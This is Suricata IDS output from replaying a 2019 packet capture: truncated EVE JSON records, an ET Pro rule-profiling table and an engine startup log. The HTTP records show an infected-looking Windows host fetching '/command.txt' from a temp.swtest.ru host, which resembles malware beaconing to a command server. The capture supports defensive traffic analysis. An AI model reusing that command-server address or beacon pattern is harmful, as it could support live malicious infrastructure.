{"timestamp":"2019-09-11T14:44:30.658788+0000","flow_id":2154753018919982,"pcap_cnt":165,"event_type":"http","src_ip":"192.168.56.101","src_port":49173,"dest_ip":"77.222.62.31","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/command.txt?rnd=119383216.665469","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain"}}
{"timestamp":"2019-09-11T14:44:30.748850+0000","flow_id":2154753018919982,"pcap_cnt":167,"event_type":"fileinfo","src_ip":"77.222.62.31","src_port":80,"dest_ip":"192.168.56.101","dest_port":49173,"proto":"TCP","http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/command.txt?rnd=119383216.665469","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4},"app_proto":"http","fileinfo":{"filename":"\/c

This file has been truncated.


suricata-4.0.0-etpro-all-perf.txt-2019-09-16-T-10-50-40-09162019.1050-pcap_4.pcap.txt - (58710 bytes) - download
  --------------------------------------------------------------------------
  Date: 9/16/2019 -- 10:50:40. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        2816922      1        5        16223556     2.95   79       0        11626210    205361.47   0.00        205361.47  
  2        2023623      1        3        10903404     1.98   93       0        10474946    117240.90   0.00        117240.90  
  3        2805348      1        4        3090036      0.56   32       0        529408      96563.62    0.00        96563.62   
  4        2023624      1        3        1096846      0.20   126      0        438998      8705.13     0.00        8705.13    
  5        2008120      1        4        1237960      0.22   162      0        418238      7641.73     0.00        7641.73    
  6        2016855      1        2        481518       0.09   2        0        249358      240759.00   0.00        240759.00  
  7        2803027      1        6        527942       0.10   4        0        220806      131985.50   0.00        131985.50  
  8        2016854      1        3        410992       0.07   2        0        217536      205496.00   0.00        205496.00  
  9        2024135      1        2        1692232      0.31   27       0        197470      62675.26    0.00        62675.26   
  10       2802987      1        5        568830       0.10   8        0        184376      71103.75    0.00        71103.75   
  11       2813059      1        4        1119250      0.20   9        0        151164      124361.11   0.00        124361.11  
  12       2816909      1        2        7398520      1.34   79       0        151158      93652.15    0.00        93652.15   
  13       2022339      1        2        4739272      0.86   79       0        150470      59990.78    0.00        59990.78   
  14       2023316      1        2        987896       0.18   25       0        150282      39515.84    0.00        39515.84   
  15       2025064      1        5        4598404      0.84   79       0        147018      58207.65    0.00        58207.65   
  16       2022830      1        2        196688       0.04   2        0        146382      98344.00    0.00        98344.00   
  17       2022566      1        5        202700       0.04   2        0        146092      101350.00   0.00        101350.00  
  18       2816910      1        2        7334592      1.33   79       0        143310      92842.94    0.00        92842.94   
  19       2022658      1        4        202770       0.04   2        0        134732      101385.00   0.00        101385.00  
  20       2816940      1        2        7150580      1.30   79       0        131550      90513.67    0.00        90513.67   
  21       2816895      1        2        4786216      0.87   79       0        129662      60585.01    0.00        60585.01   
  22       2018241      1        2        219038       0.04   2        0        125096      109519.00   0.00        109519.00  
  23       2018959      1        3        211134       0.04   2        2        123342      105567.00   105567.00   0.00       
  24       2824591      1        2        1916596      0.35   27       0        118950      70985.04    0.00        70985.04   
  25       2830124      1        1        4670162      0.85   79       0        118816      59115.97    0.00        59115.97   
  26       2828008      1        2        2814194      0.51   79       0        118094      35622.71    0.00        35622.71   
  27       2018242      1        5        3687990      0.67   79       0        117212      46683.42    0.00        46683.42   
  28       2018958      1        18       6250328      1.14   79       0        116704      79118.08    0.00        79118.08   
  29       2023315      1        2        6097636      1.11   79       0        114334      77185.27    0.00        77185.27   
  30       2808793      1        3        3071424      0.56   50       0        114270      61428.48    0.00        61428.48   
  31       2018666      1        4        223216       0.04   3        0        112858      74405.33    0.00        74405.33   
  32       2022503      1        2        5418180      0.98   79       0        112814      68584.56    0.00        68584.56   
  33       2828986      1        2        1476796      0.27   27       0        111406      54696.15    0.00        54696.15   
  34       2023875      1        2        4909748      0.89   79       0        111268      62148.71    0.00        62148.71   
  35       2003657      1        18       3085938      0.56   79       0        110834      39062.51    0.00        39062.51   
  36       2022502      1        4        5405686      0.98   79       0        110748      68426.41    0.00        68426.41   
  37       2816930      1        4        5205792      0.95   79       0        109882      65896.10    0.00        65896.10   
  38       2014442      1        6        1872302      0.34   27       0        108432      69344.52    0.00        69344.52   
  39       2023679      1        3        185230       0.03   2        0        107230      92615.00    0.00        92615.00   
  40       2022609      1        2        4335728      0.79   79       0        106364      54882.63    0.00        54882.63   
  41       2829607      1        1        3014956      0.55   79       0        105054      38164.00    0.00        38164.00   
  42       2022818      1        3        1905624      0.35   27       0        104600      70578.67    0.00        70578.67   
  43       2016706      1        20       1747756      0.32   27       0        103198      64731.70    0.00        64731.70   
  44       2024141      1        2        1658522      0.30   27       0        102514      61426.74    0.00        61426.74   
  45       2815180      1        3        1757696      0.32   27       0        102200      65099.85    0.00        65099.85   
  46       2018581      1        3        147730       0.03   2        0        102024      73865.00    0.00        73865.00   
  47       2809547      1        5        2967520      0.54   79       0        101968      37563.54    0.00        37563.54   
  48       2820851      1        5        4624620      0.84   79       0        101652      58539.49    0.00        58539.49   
  49       2816928      1        3        5378620      0.98   79       0        101156      68083.80    0.00        68083.80   
  50       2024140      1        2        1654566      0.30   27       0        100824      61280.22    0.00        61280.22   
  51       2816929      1        4        5260518      0.96   79       0        100646      66588.84    0.00        66588.84   
  52       2816927      1        3        5873382      1.07   79       0        100610      74346.61    0.00        74346.61   
  53       2820786      1        2        1332806      0.24   27       0        99452       49363.19    0.00        49363.19   
  54       2020826      1        7        171980       0.03   2        0        98088       85990.00    0.00        85990.00   
  55       2828060      1        4        1529364      0.28   27       0        98004       56643.11    0.00        56643.11   
  56       2801929      1        7        418954       0.08   6        0        97698       69825.67    0.00        69825.67   
  57       2805089      1        6        2408178      0.44   50       0        97062       48163.56    0.00        48163.56   
  58       2023671      1        4        182304       0.03   2        0        96832       91152.00    0.00        91152.00   
  59       2024142      1        2        1632188      0.30   27       0        96788       60451.41    0.00        60451.41   
  60       2024137      1        2        1627738      0.30   27       0        96048       60286.59    0.00        60286.59   
  61       2828122      1        2        4590126      0.83   79       0        95358       58102.86    0.00        58102.86   
  62       2816327      1        4        4655806      0.85   79       0        95166       58934.25    0.00        58934.25   
  63       2819673      1        4        4532048      0.82   79       0        94982       57367.70    0.00        57367.70   
  64       2018452      1        15       4730804      0.86   79       0        94602       59883.59    0.00        59883.59   
  65       2023670      1        3        5322734      0.97   79       79       94494       67376.38    67376.38    0.00       
  66       2811826      1        7        1613196      0.29   27       0        93950       59748.00    0.00        59748.00   
  67       2815181      1        3        1654786      0.30   27       0        93846       61288.37    0.00        61288.37   
  68       2022896      1        5        169894       0.03   2        0        93822       84947.00    0.00        84947.00   
  69       2822801      1        2        1381796      0.25   27       0        93480       51177.63    0.00        51177.63   
  70       2815182      1        3        1614156      0.29   27       0        93444       59783.56    0.00        59783.56   
  71       2022262      1        3        3753684      0.68   79       0        92460       47514.99    0.00        47514.99   
  72       2023672      1        4        168418       0.03   2        0        92376       84209.00    0.00        84209.00   
  73       2008575      1        5        447804       0.08   25       0        92032       17912.16    0.00        17912.16   
  74       2018316      1        4        214620       0.04   3        0        92018       71540.00    0.00        71540.00   
  75       2821615      1        2        3744162      0.68   79       0        91502       47394.46    0.00        47394.46   
  76       2816931      1        3        5212744      0.95   79       0        91178       65984.10    0.00        65984.10   
  77       2013352      1        4        173908       0.03   2        0        91172       86954.00    0.00        86954.00   
  78       2018079      1        2        1344092      0.24   27       0        91028       49781.19    0.00        49781.19   
  79       2805155      1        3        2447096      0.44   50       0        90498       48941.92    0.00        48941.92   
  80       2011894      1        19       4610198      0.84   79       0        90282       58356.94    0.00        58356.94   
  81       2816328      1        5        3815164      0.69   79       0        90180       48293.22    0.00        48293.22   
  82       2809363      1        3        1372420      0.25   27       0        90060       50830.37    0.00        50830.37   
  83       2803187      1        6        1359266      0.25   27       0        90002       50343.19    0.00        50343.19   
  84       2816925      1        3        4705948      0.85   79       0        89512       59568.96    0.00        59568.96   
  85       2020964      1        2        1405762      0.26   27       0        89408       52065.26    0.00        52065.26   
  86       2804626      1        9        2909520      0.53   79       0        89222       36829.37    0.00        36829.37   
  87       2019881      1        3        3667386      0.67   79       0        89114       46422.61    0.00        46422.61   
  88       2816526      1        13       3603254      0.65   79       0        88284       45610.81    0.00        45610.81   
  89       2024771      1        1        4305182      0.78   159      0        88202       27076.62    0.00        27076.62   
  90       2014405      1        10       3953586      0.72   79       0        88094       50045.39    0.00        50045.39   
  91       2811905      1        3        1326678      0.24   27       0        87962       49136.22    0.00        49136.22   
  92       2019344      1        5        4503860      0.82   79       0        87506       57010.89    0.00        57010.89   
  93       2016858      1        10       4010162      0.73   79       0        87340       50761.54    0.00        50761.54   
  94       2827279      1        5        2930256      0.53   79       0        87136       37091.85    0.00        37091.85   
  95       2021418      1        9        1385736      0.25   27       0        87114       51323.56    0.00        51323.56   
  96       2024133      1        2        1620928      0.29   27       0        87094       60034.37    0.00        60034.37   
  97       2018496      1        9        3746472      0.68   79       0        87026       47423.70    0.00        47423.70   
  98       2816525      1        10       4510076      0.82   79       0        86558       57089.57    0.00        57089.57   
  99       2022220      1        2        5249020      0.95   79       0        85984       66443.29    0.00        66443.29   
  100      2003492      1        30       2913086      0.53   79       0        85384       36874.51    0.00        36874.51   
  101      2812916      1        6        3821928      0.69   79       0        85362       48378.84    0.00        48378.84   
  102      2022986      1        3        1379388      0.25   27       0        85306       51088.44    0.00        51088.44   
  103      2820992      1        4        1418906      0.26   27       0        84958       52552.07    0.00        52552.07   
  104      2805985      1        2        147330       0.03   2        0        84896       73665.00    0.00        73665.00   
  105      2821471      1        2        1349214      0.25   27       0        84682       49970.89    0.00        49970.89   
  106      2020963      1        2        1385644      0.25   27       0        84368       51320.15    0.00        51320.15   
  107      2815220      1        2        1614306      0.29   27       0        84300       59789.11    0.00        59789.11   
  108      2017261      1        3        1332492      0.24   27       0        84290       49351.56    0.00        49351.56   
  109      2014353      1        6        159108       0.03   2        0        83604       79554.00    0.00        79554.00   
  110      2815568      1        2        1574258      0.29   27       0        83310       58305.85    0.00        58305.85   
  111      2807069      1        4        1306150      0.24   25       0        83304       52246.00    0.00        52246.00   
  112      2800919      1        5        1290974      0.23   27       0        83236       47813.85    0.00        47813.85   
  113      2019395      1        2        563952       0.10   9        0        82286       62661.33    0.00        62661.33   
  114      2825587      1        2        1343254      0.24   27       0        81786       49750.15    0.00        49750.15   
  115      2025162      1        2        3685504      0.67   79       0        81784       46651.95    0.00        46651.95   
  116      2021139      1        2        1518698      0.28   27       0        81344       56248.07    0.00        56248.07   
  117      2022985      1        4        1331050      0.24   27       0        81334       49298.15    0.00        49298.15   
  118      2018055      1        3        2510742      0.46   50       0        81146       50214.84    0.00        50214.84   
  119      2801930      1        7        408944       0.07   6        0        80350       68157.33    0.00        68157.33   
  120      2812616      1        2        2404906      0.44   50       0        79930       48098.12    0.00        48098.12   
  121      2018358      1        7        4582334      0.83   79       0        79894       58004.23    0.00        58004.23   
  122      2810045      1        4        126762       0.02   2        0        79502       63381.00    0.00        63381.00   
  123      2014471      1        6        141866       0.03   2        0        79162       70933.00    0.00        70933.00   
  124      2815156      1        2        1316682      0.24   27       0        79064       48766.00    0.00        48766.00   
  125      2024134      1        2        1

This file has been truncated.


suricata-report-2019-09-16-T-10-50-40-09162019.1050-pcap_4.pcap.txt - (17648 bytes) - download
lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/4af40c2c9c43f7fcc993afd736c52ccf56b33745cb75ec8c950e11a498e082d2 -r /var/pcap/09162019.1050-pcap_4.pcap -vvv -k none
elapsedtime:25.804839
stderr:
stdout:
16/9/2019 -- 10:50:14 - <Info> - Configuration node 'rule-files' redefined.
16/9/2019 -- 10:50:14 - <Notice> - This is Suricata version 4.0.0 RELEASE
16/9/2019 -- 10:50:14 - <Info> - CPUs/cores online: 1
16/9/2019 -- 10:50:14 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 34194 and 'request-body-inspect-window' set to 17177 after randomization.
16/9/2019 -- 10:50:14 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 34187 and 'response-body-inspect-window' set to 16092 after randomization.
16/9/2019 -- 10:50:14 - <Config> - DNS request flood protection level: 500
16/9/2019 -- 10:50:14 - <Config> - DNS per flow memcap (state-memcap): 524288
16/9/2019 -- 10:50:14 - <Config> - DNS global memcap: 16777216
16/9/2019 -- 10:50:14 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
16/9/2019 -- 10:50:14 - <Config> - preallocated 1000 hosts of size 136
16/9/2019 -- 10:50:14 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
16/9/2019 -- 10:50:14 - <Config> - using magic-file /usr/share/file/magic
16/9/2019 -- 10:50:14 - <Config> - Core dump size is unlimited.
16/9/2019 -- 10:50:14 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
16/9/2019 -- 10:50:14 - <Config> - preallocated 1000 defrag trackers of size 168
16/9/2019 -- 10:50:14 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
16/9/2019 -- 10:50:14 - <Config> - stream "prealloc-sessions": 2048 (per thread)
16/9/2019 -- 10:50:14 - <Config> - stream "memcap": 33554432
16/9/2019 -- 10:50:14 - <Config> - stream "midstream" session pickups: disabled
16/9/2019 -- 10:50:14 - <Config> - stream "async-oneside": disabled
16/9/2019 -- 10:50:14 - <Config> - stream "checksum-validation": disabled
16/9/2019 -- 10:50:14 - <Config> - stream."inline": disabled
16/9/2019 -- 10:50:14 - <Config> - stream "bypass": disabled
16/9/2019 -- 10:50:14 - <Config> - stream "max-synack-queued": 5
16/9/2019 -- 10:50:14 - <Config> - stream.reassembly "memcap": 134217728
16/9/2019 -- 10:50:14 - <Config> - stream.reassembly "depth": 0
16/9/2019 -- 10:50:14 - <Config> - stream.reassembly "toserver-chunk-size": 2477
16/9/2019 -- 10:50:14 - <Config> - stream.reassembly "toclient-chunk-size": 2652
16/9/2019 -- 10:50:14 - <Config> - stream.reassembly.raw: enabled
16/9/2019 -- 10:50:14 - <Config> - stream.reassembly "segment-prealloc": 2048
16/9/2019 -- 10:50:14 - <Config> - Delayed detect disabled
16/9/2019 -- 10:50:14 - <Config> - pattern matchers: MPM: ac, SPM: bm
16/9/2019 -- 10:50:14 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
16/9/2019 -- 10:50:14 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
16/9/2019 -- 10:50:14 - <Config> - prefilter engines: MPM
16/9/2019 -- 10:50:14 - <Config> - IP reputation disabled
16/9/2019 -- 10:50:14 - <Perf> - Registered 148 keyword profiling counters.
16/9/2019 -- 10:50:14 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ftp.rules
16/9/2019 -- 10:50:14 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-policy.rules
16/9/2019 -- 10:50:14 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-trojan.rules
16/9/2019 -- 10:50:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-games.rules
16/9/2019 -- 10:50:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-pop3.rules
16/9/2019 -- 10:50:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-user_agents.rules
16/9/2019 -- 10:50:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-activex.rules
16/9/2019 -- 10:50:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-rpc.rules
16/9/2019 -- 10:50:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-attack_response.rules
16/9/2019 -- 10:50:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp.rules
16/9/2019 -- 10:50:19 - <Config> - No rules loaded from ET-icmp.rules.
16/9/2019 -- 10:50:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-scan.rules
16/9/2019 -- 10:50:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-voip.rules
16/9/2019 -- 10:50:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-chat.rules
16/9/2019 -- 10:50:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp_info.rules
16/9/2019 -- 10:50:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-info.rules
16/9/2019 -- 10:50:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-shellcode.rules
16/9/2019 -- 10:50:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_client.rules
16/9/2019 -- 10:50:20 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-imap.rules
16/9/2019 -- 10:50:20 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_server.rules
16/9/2019 -- 10:50:20 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-current_events.rules
16/9/2019 -- 10:50:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-inappropriate.rules
16/9/2019 -- 10:50:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-smtp.rules
16/9/2019 -- 10:50:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_specific_apps.rules
16/9/2019 -- 10:50:24 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-deleted.rules
16/9/2019 -- 10:50:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-malware.rules
16/9/2019 -- 10:50:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-snmp.rules
16/9/2019 -- 10:50:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-worm.rules
16/9/2019 -- 10:50:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dns.rules
16/9/2019 -- 10:50:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-misc.rules
16/9/2019 -- 10:50:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-sql.rules
16/9/2019 -- 10:50:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dos.rules
16/9/2019 -- 10:50:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-netbios.rules
16/9/2019 -- 10:50:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-telnet.rules
16/9/2019 -- 10:50:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-exploit.rules
16/9/2019 -- 10:50:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-p2p.rules
16/9/2019 -- 10:50:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tftp.rules
16/9/2019 -- 10:50:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-mobile_malware.rules
16/9/2019 -- 10:50:27 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-botcc.rules
16/9/2019 -- 10:50:27 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-compromised.rules
16/9/2019 -- 10:50:27 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-drop.rules
16/9/2019 -- 10:50:27 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dshield.rules
16/9/2019 -- 10:50:27 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tor.rules
16/9/2019 -- 10:50:27 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ciarmy.rules
16/9/2019 -- 10:50:27 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/local.rules
16/9/2019 -- 10:50:27 - <Config> - No rules loaded from local.rules.
16/9/2019 -- 10:50:27 - <Info> - 44 rule files processed. 39585 rules successfully loaded, 0 rules failed
16/9/2019 -- 10:50:27 - <Info> - Threshold config parsed: 0 rule(s) found
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for tcp-packet
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for tcp-stream
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for udp-packet
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for other-ip
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_uri
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_request_line
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_client_body
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_response_line
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_header
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_header
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_header_names
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_header_names
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_accept
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_accept_enc
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_accept_lang
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_referer
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_connection
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_content_len
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_content_len
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_content_type
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_content_type
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_protocol
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_protocol
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_start
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_start
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_raw_header
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_raw_header
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_method
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_cookie
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_cookie
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_raw_uri
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_user_agent
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_host
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_raw_host
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_stat_msg
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_stat_code
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for dns_query
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for tls_sni
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for tls_cert_issuer
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for tls_cert_subject
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for tls_cert_serial
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for dce_stub_data
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for dce_stub_data
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for ssh_protocol
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for ssh_protocol
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for ssh_software
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for ssh_software
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for file_data
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for file_data
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_request_line
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_response_line
16/9/2019 -- 10:50:28 - <Info> - 39590 signatures processed. 1175 are IP-only rules, 15422 are inspecting packet payload, 27448 inspect application layer, 0 are decoder event only
16/9/2019 -- 10:50:28 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
16/9/2019 -- 10:50:28 - <Perf> - TCP toserver: 41 port groups, 37 unique SGH's, 4 copies
16/9/2019 -- 10:50:28 - <Perf> - TCP toclient: 21 port groups, 20 unique SGH's, 1 copies
16/9/2019 -- 10:50:28 - <Perf> - UDP toserver: 41 port groups, 27 unique SGH's, 14 copies
16/9/2019 -- 10:50:28 - <Perf> - UDP toclient: 21 port groups, 17 unique SGH's, 4 copies
16/9/2019 -- 10:50:28 - <Perf> - OTHER toserver: 254 proto groups, 3 unique SGH's, 251 copies
16/9/2019 -- 10:50:28 - <Perf> - OTHER toclient: 254 proto groups, 0 unique SGH's, 254 copies
16/9/2019 -- 10:50:35 - <Perf> - Unique rule groups: 104
16/9/2019 -- 10:50:35 - <Perf> - Builtin MPM "toserver TCP packet": 35
16/9/2019 -- 10:50:35 - <Perf> - Builtin MPM "toclient TCP packet": 17
16/9/2019 -- 10:50:35 - <Perf> - Builtin MPM "toserver TCP stream": 33
16/9/2019 -- 10:50:35 - <Perf> - Builtin MPM "toclient TCP stream": 19
16/9/2019 -- 10:50:35 - <Perf> - Builtin MPM "toserver UDP packet": 27
16/9/2019 -- 10:50:35 - <Perf> - Builtin MPM "toclient UDP packet": 17
16/9/2019 -- 10:50:35 - <Perf> - Builtin MPM "other IP packet": 3
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver http_uri": 14
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver http_request_line": 1
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver http_client_body": 6
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toclient http_response_line": 1
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver http_header": 10
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toclient http_header": 6
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver http_header_names": 2
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver http_accept": 1
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver http_referer": 1
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver http_content_len": 1
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver http_content_type": 1
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toclient http_content_type": 1
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver http_protocol": 1
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver http_start": 1
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver http_raw_header": 1
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toclient http_raw_header": 1
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver http_method": 5
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver http_cookie": 1
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toclient http_cookie": 2
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver http_raw_uri": 1
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver http_user_agent": 6
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver http_host": 2
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toclient http_stat_code": 2
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver dns_query": 4
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver tls_sni": 2
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toclient tls_cert_issuer": 2
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toclient tls_cert_subject": 1
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toclient tls_cert_serial": 1
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver ssh_protocol": 1
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver file_data": 1
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toclient file_data": 7
16/9/2019 -- 10:50:38 - <Perf> - Registered 39590 rule profiling counters.
16/9/2019 -- 10:50:38 - <Info> - fast output device (regular) initialized: alert
16/9/2019 -- 10:50:38 - <Info> - eve-log output device (regular) initialized: eve.json
16/9/2019 -- 10:50:38 - <Config> - enabling 'eve-log' module 'alert'
16/9/2019 -- 10:50:38 - <Config> - enabling 'eve-log' module 'http'
16/9/2019 -- 10:50:38 - <Config> - enabling 'eve-log' module 'dns'
16/9/2019 -- 10:50:38 - <Config> - enabling 'eve-log' module 'tls'
16/9/2019 -- 10:50:38 - <Config> - enabling 'eve-log' module 'files'
16/9/2019 -- 10:50:38 - <Config> - enabling 'eve-log' module 'ssh'
16/9/2019 -- 10:50:38 - <Info> - Unified2-alert initialized: filename unified2.alert, limit 32 MB
